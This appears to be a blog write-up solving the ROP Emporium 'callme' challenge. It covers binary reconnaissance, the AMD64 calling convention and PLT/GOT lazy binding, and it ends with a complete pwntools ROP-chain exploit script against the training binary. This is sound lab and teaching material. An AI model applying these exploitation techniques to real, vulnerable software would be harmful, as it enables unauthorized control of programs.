ROP Emporium - callme


After familiarising ourselves with a simple buffer overflow in ret2win to overwrite the return address first, and then searching and using our first real gadget in split we will now focus on the Procedure Linkage Table (PLT). While here the functions that need to be called will all be using three arguments, thus exposing a little bit more of the amd64 calling convention.

Exploring the binary

It should be a familiar routine by now to check the binary for any compiled-in security measures, followed by looking for strings and functions. For this assignment we're given two files, callme and libcalme.so where the latter is required by the former.

jasper@ropper:~/ropemporium/callme$ checksec callme
[*] '/home/jasper/ropemporium/callme/callme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RPATH:    './'
jasper@ropper:~/ropemporium/callme$ rabin2 -z callme
[Strings]
Num Paddr      Vaddr      Len Size Section  Type  String
000 0x00001b48 0x00401b48  22  23 (.rodata) ascii callme by ROP Emporium
001 0x00001b5f 0x00401b5f   7   8 (.rodata) ascii 64bits\n
002 0x00001b67 0x00401b67   8   9 (.rodata) ascii \nExiting
003 0x00001b70 0x00401b70  33  34 (.rodata) ascii Hope you read the instructions...
jasper@ropper:~/ropemporium/callme$ rabin2 -z libcallme.so
[Strings]
Num Paddr      Vaddr      Len Size Section  Type  String
000 0x00000bb2 0x00000bb2  18  19 (.rodata) ascii encrypted_flag.txt
001 0x00000bc8 0x00000bc8  33  34 (.rodata) ascii Failed to open encrypted_flag.txt
002 0x00000bea 0x00000bea  25  26 (.rodata) ascii Could not allocate memory
003 0x00000c04 0x00000c04  20  21 (.rodata) ascii Incorrect parameters
004 0x00000c19 0x00000c19   8   9 (.rodata) ascii key1.dat
005 0x00000c22 0x00000c22  23  24 (.rodata) ascii Failed to open key1.dat
006 0x00000c3a 0x00000c3a   8   9 (.rodata) ascii key2.dat
007 0x00000c43 0x00000c43  23  24 (.rodata) ascii Failed to open key2.dat
jasper@ropper:~/ropemporium/callme$ nm callme | grep ' t '
0000000000401950 t __do_global_dtors_aux
0000000000601df8 t __do_global_dtors_aux_fini_array_entry
0000000000601df0 t __frame_dummy_init_array_entry
0000000000601df8 t __init_array_end
0000000000601df0 t __init_array_start
00000000004018d0 t deregister_tm_clones
0000000000401970 t frame_dummy
0000000000401a05 t pwnme
0000000000401910 t register_tm_clones
0000000000401a57 t usefulFunction
jasper@ropper:~/ropemporium/callme$ nm libcallme.so | grep ' T '
0000000000000ba0 T _fini
0000000000000728 T _init
00000000000008f0 T callme_one
0000000000000aaa T callme_three
00000000000009d4 T callme_two
jasper@ropper:~/ropemporium/callme$ rabin2 -i callme
[Imports]
Num  Vaddr       Bind      Type Name
   1 0x00000000    WEAK  NOTYPE _ITM_deregisterTMCloneTable
   2 0x004017f0  GLOBAL    FUNC puts
   3 0x00401800  GLOBAL    FUNC printf
   4 0x00401810  GLOBAL    FUNC callme_three
   5 0x00401820  GLOBAL    FUNC memset
   6 0x00401830  GLOBAL    FUNC __libc_start_main
   7 0x00401840  GLOBAL    FUNC fgets
   8 0x00401850  GLOBAL    FUNC callme_one
   9 0x00000000    WEAK  NOTYPE __gmon_start__
  10 0x00401860  GLOBAL    FUNC setvbuf
  11 0x00401870  GLOBAL    FUNC callme_two
  12 0x00000000    WEAK  NOTYPE _Jv_RegisterClasses
  13 0x00401880  GLOBAL    FUNC exit
  14 0x00000000    WEAK  NOTYPE _ITM_registerTMCloneTable
   1 0x00000000    WEAK  NOTYPE _ITM_deregisterTMCloneTable
   9 0x00000000    WEAK  NOTYPE __gmon_start__
  12 0x00000000    WEAK  NOTYPE _Jv_RegisterClasses
  14 0x00000000    WEAK  NOTYPE _ITM_registerTMCloneTable
jasper@ropper:~/ropemporium/callme$ rabin2 -i libcallme.so
[Imports]
Num  Vaddr       Bind      Type Name
   2 0x00000000    WEAK  NOTYPE _ITM_deregisterTMCloneTable
   3 0x00000760  GLOBAL    FUNC puts
   4 0x00000770  GLOBAL    FUNC fclose
   5 0x00000780  GLOBAL    FUNC printf
   6 0x00000790  GLOBAL    FUNC fgetc
   7 0x000007a0  GLOBAL    FUNC fgets
   8 0x00000000    WEAK  NOTYPE __gmon_start__
   9 0x000007b0  GLOBAL    FUNC malloc
  10 0x000007c0  GLOBAL    FUNC fopen
  11 0x00000000    WEAK  NOTYPE _Jv_RegisterClasses
  12 0x000007d0  GLOBAL    FUNC exit
  13 0x00000000    WEAK  NOTYPE _ITM_registerTMCloneTable
  14 0x00000000    WEAK    FUNC __cxa_finalize
   2 0x00000000    WEAK  NOTYPE _ITM_deregisterTMCloneTable
   8 0x00000000    WEAK  NOTYPE __gmon_start__
  11 0x00000000    WEAK  NOTYPE _Jv_RegisterClasses
  13 0x00000000    WEAK  NOTYPE _ITM_registerTMCloneTable
  14 0x00000000    WEAK    FUNC __cxa_finalize
jasper@ropper:~/ropemporium/callme$ rabin2 -R callme
[Relocations]
vaddr=0x00601ff8 paddr=0x00001ff8 type=SET_64 __gmon_start__
vaddr=0x00602080 paddr=0x00602080 type=SET_64
vaddr=0x00602090 paddr=0x00602090 type=SET_64
vaddr=0x006020a0 paddr=0x006020a0 type=SET_64
vaddr=0x00602018 paddr=0x00002018 type=SET_64 puts
vaddr=0x00602020 paddr=0x00002020 type=SET_64 printf
vaddr=0x00602028 paddr=0x00002028 type=SET_64 callme_three
vaddr=0x00602030 paddr=0x00002030 type=SET_64 memset
vaddr=0x00602038 paddr=0x00002038 type=SET_64 __libc_start_main
vaddr=0x00602040 paddr=0x00002040 type=SET_64 fgets
vaddr=0x00602048 paddr=0x00002048 type=SET_64 callme_one
vaddr=0x00602050 paddr=0x00002050 type=SET_64 setvbuf
vaddr=0x00602058 paddr=0x00002058 type=SET_64 callme_two
vaddr=0x00602060 paddr=0x00002060 type=SET_64 exit

14 relocations

According to the instructions page we need to call the functions callme_one(), callme_two(), callme_three() in that specific order, with the arguments 1, 2, 3.

We can already determine the exploit should take the form of overflowing the buffer (with 40 bytes) and send the ROP chain equivalent of:

mov rdi, 1
mov rsi, 2
mov rdx, 3
call callme_one
mov rdi, 1
mov rsi, 2
mov rdx, 3
call callme_two
mov rdi, 1
mov rsi, 2
mov rdx, 3
call callme_three

A note on the AMD64 ABI

Let's take a step back for a minute to look at the register usage here. As I wrote before, this assignment requires a little bit more knowledge of the amd64 calling convention. Or more specifically, the System V AMD64 ABI's calling convention. This states that the first six argument for a function are to be provided the following registers:

  • RDI
  • RSI
  • RDX
  • RCX
  • R8
  • R9

Furthermore it's worth mentioning the concepts of callee saved versus caller saved registers. A callee saved register is a register that the callee must take care of restoring to the original value before the callee was called. This is essentially a contract between the caller and the callee that the caller can expect to find the contents of these registers unchanged when the callee returns. On amd64 the RBX, RBP and R12 - R15 are callee saved. The remaining registers are caller saved.

Even in smaller binaries (outside of the scope of ROP Emporium where most binaries have a special usefulFunction() which contains useful gadgets) it's fairly common to find gadgets that will allow control over RDI and RSI, it's harder in those situations to get control over the remaining registers as we'll see in fluff and ret2csu, due to the lack of gadgets that allow modifications of RDX.

Lazy binding

Looking at gdb-peda output while single stepping through callme we hit upon this call instruction:

0x4019b3 <main+29>:  call   0x401860 <setvbuf@plt>

Also note the relocation of this symbol has:

0000000000602050 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5

so printing this addres we can see it resolves to the PLT entry:

gdb-peda$ p/x *0x602050
$6 = 0x401866

Let's take a closer look at the PLT stub for setvbuf:

0000000000401860 <setvbuf@plt>:
  401860:       ff 25 ea 07 20 00       jmpq   *0x2007ea(%rip)        # 602050 <setvbuf@GLIBC_2.2.5>
  401866:       68 07 00 00 00          pushq  $0x7
  40186b:       e9 70 ff ff ff          jmpq   4017e0 <.plt>

Also note that our regular call jumps to 0x401860 and then using RIP-relative addressing jumps to 0x0x60204a (0x401860 + 0x2007ea) which lies in another section.

From the output of iS: we can determine that 0x60204a is in the GOT PLT memory range:

[0x0060204a]> iS
[Sections]
Nm Paddr       Size Vaddr      Memsz Perms Name
00 0x00000000     0 0x00000000     0 ----
01 0x00001238    28 0x00401238    28 -r-- .interp
02 0x00001254    32 0x00401254    32 -r-- .note.ABI_tag
03 0x00001274    36 0x00401274    36 -r-- .note.gnu.build_id
04 0x00001298    68 0x00401298    68 -r-- .gnu.hash
05 0x000012e0   552 0x004012e0   552 -r-- .dynsym
06 0x00001508   275 0x00401508   275 -r-- .dynstr
07 0x0000161c    46 0x0040161c    46 -r-- .gnu.version
08 0x00001650    32 0x00401650    32 -r-- .gnu.version_r
09 0x00001670    96 0x00401670    96 -r-- .rela.dyn
10 0x000016d0   240 0x004016d0   240 -r-- .rela.plt
11 0x000017c0    26 0x004017c0    26 -r-x .init
12 0x000017e0   176 0x004017e0   176 -r-x .plt
13 0x00001890     8 0x00401890     8 -r-x .plt.got
14 0x000018a0   658 0x004018a0   658 -r-x .text
15 0x00001b34     9 0x00401b34     9 -r-x .fini
16 0x00001b40    85 0x00401b40    85 -r-- .rodata
17 0x00001b98    68 0x00401b98    68 -r-- .eh_frame_hdr
18 0x00001be0   308 0x00401be0   308 -r-- .eh_frame
19 0x00001df0     8 0x00601df0     8 -rw- .init_array
20 0x00001df8     8 0x00601df8     8 -rw- .fini_array
21 0x00001e00     8 0x00601e00     8 -rw- .jcr
22 0x00001e08   496 0x00601e08   496 -rw- .dynamic
23 0x00001ff8     8 0x00601ff8     8 -rw- .got
24 0x00002000   104 0x00602000   104 -rw- .got.plt
25 0x00002068    16 0x00602068    16 -rw- .data
26 0x00002078     0 0x00602080    48 -rw- .bss
27 0x00002078    52 0x00000000    52 ---- .comment
28 0x00002b63   268 0x00000000   268 ---- .shstrtab
29 0x000020b0  1968 0x00000000  1968 ---- .symtab
30 0x00002860   771 0x00000000   771 ---- .strtab

[0x0060204a]>

Using radare2 we seek to the .got.plt section and disassemble it:

[0x004017e0]> s section..got.plt
[0x00602000]> pd
            ;-- section..got.plt:
            ;-- _GLOBAL_OFFSET_TABLE_:
...
            ;-- reloc.setvbuf:
            ; CODE XREF from sym.imp.setvbuf (0x401860)
            0x00602050      .qword 0x0000000000401866                  ; RELOC 64 setvbuf

The first time a function is called (and not yet resolved) this will jump back into the PLT but past the initial jmpq. It pushes the .got.plt offset (0x7 for setvbuf()) to the stack and jumps to the head of the .plt at 0x4017e0. From here it will jump to the runtime linker which patches the GOT entry with the actual function address and execute said function. For functions it patches the .got.plt for other symbols it will patch the .got instead. Future calls or references will go from the GOT straight to the actual function On Linux/GLIBC the _dl_runtime_resolve_avx() function is responsible for resolving. This proces is called lazy binding. As the .got.plt is writable it is a data section to prevent the runtime linker from having to modify the text .plt section.

To get the addresses of the callme functions inside the callme binary's PLT:

0000000000401810 <callme_three@plt>:
  401810:       ff 25 12 08 20 00       jmpq   *0x200812(%rip)        # 602028 <callme_three>
0000000000401850 <callme_one@plt>:
  401850:       ff 25 f2 07 20 00       jmpq   *0x2007f2(%rip)        # 602048 <callme_one>
0000000000401870 <callme_two@plt>:
  401870:       ff 25 e2 07 20 00       jmpq   *0x2007e2(%rip)        # 602058 <callme_two>

In the context of exploitation the PLT provides us with a local reference to a remote function (once it's been resolved). This is particularly helpful when a function like system() or execve() is used which prevents us from having to leak libc addresses in order to find those functions.

Finalizing the exploit

This was all fairly clear, however I got caught off-guard by a stack alignment issue on Ubuntu 19.04, though eventually I found the problem and solved the challenge:

jasper@ropper:~/ropemporium/callme$ python callme.py
[*] Loading callme
[+] Starting local process './callme': pid 3332
[+] Receiving all data: Done (32B)
[*] Process './callme' stopped with exit code 0 (pid 3332)
[*] Captured flag: ROPE{a_placeholder_32byte_flag!}

The ROP Emporium Beginners Guide mentions the MOVAPS issue and that was precisely what I ran into. On Ubuntu 19.04 we need to align the stack otherwise buffered_vfprintf() will fail on the movaps instruction which requires a 16-byte aligned stack. We can force alignment by inserting a nop gadget before we make any further function calls, and this works just fine.

#!/usr/bin/env python

from pwn import *

def exploit():
    context(arch='x86_64', os='linux')
    context.terminal = ['tmux', 'splitw', '-h']
    #context.log_level = 'debug'

    log.info('Loading callme')
    # Start a new process and wait until we hit the prompt
    p = process('./callme')
    #p = gdb.debug('./callme')

    p.recvuntil('> ')

    # Padding to trigger the overflow
    padding = 'A' * 40

    # callme_one@plt
    callme_one = p64(0x401850)

    # callme_two@plt
    callme_two = p64(0x401870)

    # callme_three@plt
    callme_three = p64(0x401810)

    # AMD64 calling convention requires the arguments to a function to reside in
    # %rdi, %rsi,  %rdx, %rcx, %r8 and %r9. We'll use the first three only.
    # There is one very helpful gadget:
    # 0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
    popper = p64(0x401ab0)

    # 0x00000000004017d9: ret;
    nop = p64(0x4017d9)

    payload = padding
    payload += nop
    payload += popper
    payload += p64(0x1)
    payload += p64(0x2)
    payload += p64(0x3)
    payload += callme_one
    payload += popper
    payload += p64(0x1)
    payload += p64(0x2)
    payload += p64(0x3)
    payload += callme_two
    payload += popper
    payload += p64(0x1)
    payload += p64(0x2)
    payload += p64(0x3)
    payload += callme_three

    f = open('input', 'w')
    f.write(payload)
    f.close()

    p.sendline(payload)
    flag = p.recvall()
    log.info('Captured flag: {}'.format(flag))

if __name__ == '__main__':
    exploit()

Just a quick note on pwntools, instead of that long payload we manually created it could also have been written as:

rop = ROP('./callme')
rop.call('callme_one', [1, 2,3])
rop.call('callme_two', [1, 2, 3])
rop.call('callme_three', [1, 2, 3])
log.info(rop.dump()

In that case there's no need to manually search for gadgets and determine the addresses for the functions to call, pwntools handles that for us.